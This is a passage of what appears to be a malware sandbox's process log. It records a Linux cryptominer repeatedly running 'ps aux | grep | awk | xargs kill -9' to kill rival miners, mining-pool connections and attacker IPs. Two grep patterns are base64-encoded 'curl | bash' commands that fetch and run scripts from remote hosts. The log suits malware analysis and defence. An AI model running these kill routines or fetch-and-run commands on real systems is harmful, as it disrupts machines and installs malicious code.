  grep -v grep
  2⤵
  PID:1045
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1044
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1053
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1054
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1052
- /bin/grep
  grep -v grep
  2⤵
  PID:1051
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1050
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1061
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1060
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1059
- /bin/grep
  grep -v grep
  2⤵
  PID:1058
- /bin/ps
  ps aux
  2⤵
  PID:1057
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1067
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1066
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:1065
- /bin/grep
  grep -v grep
  2⤵
  PID:1064
- /bin/ps
  ps aux
  2⤵
  PID:1063
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1073
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1072
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:1071
- /bin/grep
  grep -v grep
  2⤵
  PID:1070
- /bin/ps
  ps aux
  2⤵
  PID:1069
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1080
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1079
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1078
- /bin/grep
  grep -v grep
  2⤵
  PID:1077
- /bin/ps
  ps aux
  2⤵
  PID:1076
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1087
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1086
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1085
- /bin/grep
  grep -v grep
  2⤵
  PID:1084
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1083
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1093
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1092
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1091
- /bin/grep
  grep -v grep
  2⤵
  PID:1090
- /bin/ps
  ps aux
  2⤵
  PID:1089
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1099
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1098
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1097
- /bin/grep
  grep -v grep
  2⤵
  PID:1096
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1095
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1106
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1105
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1104
- /bin/grep
  grep -v grep
  2⤵
  PID:1103
- /bin/ps
  ps aux
  2⤵
  PID:1102
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1112
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:1111
- /bin/grep
  grep -v grep
  2⤵
  PID:1110
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1109
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1118
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1117
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1116
- /bin/grep
  grep -v grep
  2⤵
  PID:1115
- /bin/ps
  ps aux
  2⤵
  PID:1114
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1126
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1125
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1124
- /bin/grep
  grep -v grep
  2⤵
  PID:1123
- /bin/ps
  ps aux
  2⤵
  PID:1122
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1134
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1133
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1132
- /bin/grep
  grep -v grep
  2⤵
  PID:1131
- /bin/ps
  ps aux
  2⤵
  PID:1130
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1142
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1141
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1140
- /bin/grep
  grep -v grep
  2⤵
  PID:1139
- /bin/ps
  ps aux
  2⤵
  PID:1138
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1148
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1147
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1146
- /bin/grep
  grep -v grep
  2⤵
  PID:1145
- /bin/ps
  ps aux
  2⤵
  PID:1144
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1155
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1154
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1153
- /bin/grep
  grep -v grep
  2⤵
  PID:1152
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1151
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1162
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1163
- /bin/grep
  grep "]"
  2⤵
  PID:1161
- /bin/grep
  grep -v aux
  2⤵
  PID:1160
- /bin/grep
  grep -v grep
  2⤵
  PID:1159
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1158
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1169
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1168
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1167
- /bin/grep
  grep -v grep
  2⤵
  PID:1166
- /bin/ps
  ps aux
  2⤵
  PID:1165
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1174
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1173
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1172
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1170
- /bin/grep
  grep -v grep
  2⤵
  PID:1171
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1179
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1178
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1180
- /bin/grep
  grep -v grep
  2⤵
  PID:1177
- /bin/ps
  ps aux
  2⤵
  PID:1176
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1186
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1187
- /bin/grep
  grep -v _
  2⤵
  PID:1185
- /bin/grep
  grep -v -
  2⤵
  PID:1184
- /bin/grep
  grep -v /
  2⤵
  PID:1183
- /bin/grep
  grep -v grep
  2⤵
  PID:1182
- /bin/ps
  ps aux
  2⤵
  PID:1181
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1192
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1191
- /bin/grep
  grep -v grep
  2⤵
  PID:1189
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1190
- /bin/ps
  ps aux
  2⤵
  PID:1188
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1197
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1196
- /bin/grep
  grep rsync
  2⤵
  PID:1195
- /bin/grep
  grep -v grep
  2⤵
  PID:1194
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1193
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1202
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1201
- /bin/grep
  grep watchd0g
  2⤵
  PID:1200
- /bin/grep
  grep -v grep
  2⤵
  PID:1199
- /bin/ps
  ps aux
  2⤵
  PID:1198
- /bin/grep
  grep -v grep
  2⤵
  PID:1204
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1203
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1205
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1207
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1206
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1205
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1205
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1205
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1205
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1205
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1205
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1212
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1211
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:1210
- /bin/grep
  grep -v grep
  2⤵
  PID:1209
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1208
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1217
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1216
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1215
- /bin/grep
  grep -v grep
  2⤵
  PID:1214
- /bin/ps
  ps aux
  2⤵
  PID:1213
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1222
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1221
- /bin/grep
  grep gitee.com
  2⤵
  PID:1220
- /bin/grep
  grep -v grep
  2⤵
  PID:1219
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1218
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1227
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1226
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1225
- /bin/grep
  grep -v grep
  2⤵
  PID:1224
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1223
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1232
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1231
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1230
- /bin/grep
  grep -v grep
  2⤵
  PID:1229
- /bin/ps
  ps aux
  2⤵
  PID:1228
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1237
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1236
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1235
- /bin/grep
  grep -v grep
  2⤵
  PID:1234
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1233
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1242
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1241
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1240
- /bin/grep
  grep -v grep
  2⤵
  PID:1239
- /bin/ps
  ps aux
  2⤵
  PID:1238
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1247
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1246
- /bin/grep
  grep kthrotlds
  2⤵
  PID:1245
- /bin/grep
  grep -v grep
  2⤵
  PID:1244
- /bin/ps
  ps aux
  2⤵
  PID:1243
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1252
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1251
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1250
- /bin/grep
  grep -v grep
  2⤵
  PID:1249
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1248
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1257
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1256
- /bin/grep
  grep netdns
  2⤵
  PID:1255
- /bin/grep
  grep -v grep
  2⤵
  PID:1254
- /bin/ps
  ps aux
  2⤵
  PID:1253
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1262
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1261
- /bin/grep
  grep watchdogs
  2⤵
  PID:1260
- /bin/grep
  grep -v grep
  2⤵
  PID:1259
- /bin/ps
  ps aux
  2⤵
  PID:1258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1267
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1266
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:1265
- /bin/grep
  grep -v grep
  2⤵
  PID:1264
- /bin/ps
  ps aux
  2⤵
  PID:1263
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1272
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1271
- /bin/grep
  grep kinsing
  2⤵
  PID:1270
- /bin/grep
  grep -v grep
  2⤵
  PID:1269
- /bin/ps
  ps aux
  2⤵
  PID:1268
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1277
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1276
- /bin/grep
  grep redis2
  2⤵
  PID:1275
- /bin/grep
  grep -v grep
  2⤵
  PID:1274
- /bin/ps
  ps aux
  2⤵
  PID:1273
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1283
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1282
- /bin/grep
  grep " ps"
  2⤵
  PID:1281
- /bin/grep
  grep -v aux
  2⤵
  PID:1280
- /bin/grep
  grep -v grep
  2⤵
  PID:1279
- /bin/ps
  ps aux
  2⤵
  PID:1278
- /bin/grep
  grep sync_supers
  2⤵
  PID:1286
- /bin/grep
  grep -v grep
  2⤵
  PID:1285
- /bin/ps
  ps aux
  2⤵
  PID:1284
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1287
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1288
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1293
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1292
- /bin/grep
  grep cpuset
  2⤵
  PID:1291
- /bin/grep
  grep -v grep
  2⤵
  PID:1290
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1289
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1299
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1298
- /bin/grep
  grep "x]"
  2⤵
  PID:1297
- /bin/grep
  grep -v aux
  2⤵
  PID:1296
- /bin/grep
  grep -v grep
  2⤵
  PID:1295
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1294
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1305
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1304
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1303
- /bin/grep
  grep -v aux
  2⤵
  PID:1302
- /bin/grep
  grep -v grep
  2⤵
  PID:1301
- /bin/ps
  ps aux
  2⤵
  PID:1300
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1311
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1310
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1309
- /bin/grep
  grep -v aux
  2⤵
  PID:1308
- /bin/grep
  grep -v grep
  2⤵
  PID:1307
- /bin/ps
  ps aux
  2⤵
  PID:1306
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1316
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1315
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1314
- /bin/grep
  grep -v grep
  2⤵
  PID:1313
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1312
- /bin/ps
  ps aux
  2⤵
  PID:1317
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1320
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1322
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1321
- /bin/grep
  grep -v grep
  2⤵
  PID:1319
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1328
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1327
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1326
- /bin/grep
  grep -v grep
  2⤵
  PID:1325
- /bin/ps
  ps aux
  2⤵
  PID:1324
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1335
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1334
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1333
- /bin/grep
  grep -v grep
  2⤵
  PID:1332
- /bin/ps
  ps aux
  2⤵
  PID:1331
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1341
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1340
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1339
- /bin/grep
  grep -v grep
  2⤵
  PID:1338
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1337
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1347
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1346
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:1345
- /bin/grep
  grep -v grep
  2⤵
  PID:1344
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1343
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1354
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1353
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1352
- /bin/grep
  grep -v grep
  2⤵
  PID:1351
- /bin/ps
  ps aux
  2⤵
  PID:1350
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1361
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1360
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:1359
- /bin/grep
  grep -v grep
  2⤵
  PID:1358
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1357
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1366
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1365
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:1364
- /bin/grep
  grep -v grep
  2⤵
  PID:1363
- /bin/ps
  ps aux
  2⤵
  PID:1362
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1373
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1372
- /bin/grep
  grep sustse
  2⤵
  PID:1371
- /bin/grep
  grep -v grep
  2⤵
  PID:1370
- /bin/ps
  ps aux
  2⤵
  PID:1369
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1380
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1379
- /bin/grep
  grep sustse3
  2⤵
  PID:1378
- /bin/grep
  grep -v grep
  2⤵
  PID:1377
- /bin/ps
  ps aux
  2⤵
  PID:1376
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1386
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1387
- /bin/grep
  grep wget
  2⤵
  PID:1385
- /bin/grep
  grep mr.sh
  2⤵
  PID:1384
- /bin/grep
  grep -v grep
  2⤵
  PID:1383
- /bin/ps
  ps aux
  2⤵
  PID:1382
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1394
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1393
- /bin/grep
  grep curl
  2⤵
  PID:1392
- /bin/grep
  grep mr.sh
  2⤵
  PID:1391
- /bin/grep
  grep -v grep
  2⤵
  PID:1390
- /bin/ps
  ps aux
  2⤵
  PID:1389
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1402
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1401
- /bin/grep
  grep wget
  2⤵
  PID:1400
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1399
- /bin/grep
  grep -v grep
  2⤵
  PID:1398
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1397
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1409
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1408
- /bin/grep
  grep curl
  2⤵
  PID:1407
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:1406
- /bin/grep
  grep -v grep
  2⤵
  PID:1405
- /bin/ps
  ps aux
  2⤵
  PID:1404
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1416
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1415
- /bin/grep
  grep wget
  2⤵
  PID:1414
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1413
- /bin/grep
  grep -v grep
  2⤵
  PID:1412
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1411
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1424
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1423
- /bin/grep
  grep curl
  2⤵
  PID:1422
- /bin/grep
  grep cr5.sh
  2⤵
  PID:1421
- /bin/grep
  grep -v grep
  2⤵
  PID:1420
- /bin/ps
  ps aux
  2⤵
  PID:1419
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1432
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1431
- /bin/grep
  grep wget
  2⤵
  PID:1430
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1429
- /bin/grep
  grep -v grep
  2⤵
  PID:1428
- /bin/ps
  ps aux
  2⤵
  PID:1427
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1438
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1437
- /bin/grep
  grep curl
  2⤵
  PID:1436
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:1435
- /bin/grep
  grep -v grep
  2⤵
  PID:1434
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1433
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1445
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1444
- /bin/grep
  grep j2.conf
  2⤵
  PID:1443
- /bin/grep
  grep -v grep
  2⤵
  PID:1442
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1441
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1453
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1452
- /bin/grep
  grep wget
  2⤵
  PID:1451
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1450
- /bin/grep
  grep -v grep
  2⤵
  PID:1449
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1448
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1459
- /bin/grep
  grep curl
  2⤵
  PID:1458
- /bin/grep
  grep luk-cpu
  2⤵
  PID:1457
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1460
- /bin/grep
  grep -v grep
  2⤵
  PID:1456
- /bin/ps
  ps aux
  2⤵
  PID:1455
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1467
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1466
- /bin/grep
  grep wget
  2⤵
  PID:1465
- /bin/grep
  grep ficov
  2⤵
  PID:1464
- /bin/grep
  grep -v grep
  2⤵
  PID:1463
- /bin/ps
  ps aux
  2⤵
  PID:1462
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1473
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1472
- /bin/grep
  grep curl
  2⤵
  PID:1471
- /bin/grep
  grep ficov
  2⤵
  PID:1470
- /bin/grep
  grep -v grep
  2⤵
  PID:1469
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1468
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1479
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1478
- /bin/grep
  grep wget
  2⤵
  PID:1477
- /bin/grep
  grep he.sh
  2⤵
  PID:1476
- /bin/grep
  grep -v grep
  2⤵
  PID:1475
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1474
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1485
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1484
- /bin/grep
  grep curl
  2⤵
  PID:1483
- /bin/grep
  grep he.sh
  2⤵
  PID:1482
- /bin/grep
  grep -v grep
  2⤵
  PID:1481
- /bin/ps
  ps aux
  2⤵
  PID:1480
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1491
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1490
- /bin/grep
  grep wget
  2⤵
  PID:1489
- /bin/grep
  grep miner.sh
  2⤵
  PID:1488
- /bin/grep
  grep -v grep
  2⤵
  PID:1487
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1486
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1497
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1496
- /bin/grep
  grep curl
  2⤵
  PID:1495
- /bin/grep
  grep miner.sh
  2⤵
  PID:1494
- /bin/grep
  grep -v grep
  2⤵
  PID:1493
- /bin/ps
  ps aux
  2⤵
  PID:1492
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1503
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1502
- /bin/grep
  grep wget
  2⤵
  PID:1501
- /bin/grep
  grep nullcrew
  2⤵
  PID:1500
- /bin/grep
  grep -v grep
  2⤵
  PID:1499
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1498
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1509
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1508
- /bin/grep
  grep curl
  2⤵
  PID:1507
- /bin/grep
  grep nullcrew
  2⤵
  PID:1506
- /bin/grep
  grep -v grep
  2⤵
  PID:1505
- /bin/ps
  ps aux
  2⤵
  PID:1504
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1514
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1513
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:1512
- /bin/grep
  grep -v grep
  2⤵
  PID:1511
- /bin/ps
  ps aux
  2⤵
  PID:1510
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1519
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1518
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:1517
- /bin/grep
  grep -v grep
  2⤵
  PID:1516
- /bin/ps
  ps aux
  2⤵
  PID:1515
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1524
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1523
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:1522
- /bin/grep
  grep -v grep
  2⤵
  PID:1521
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1520
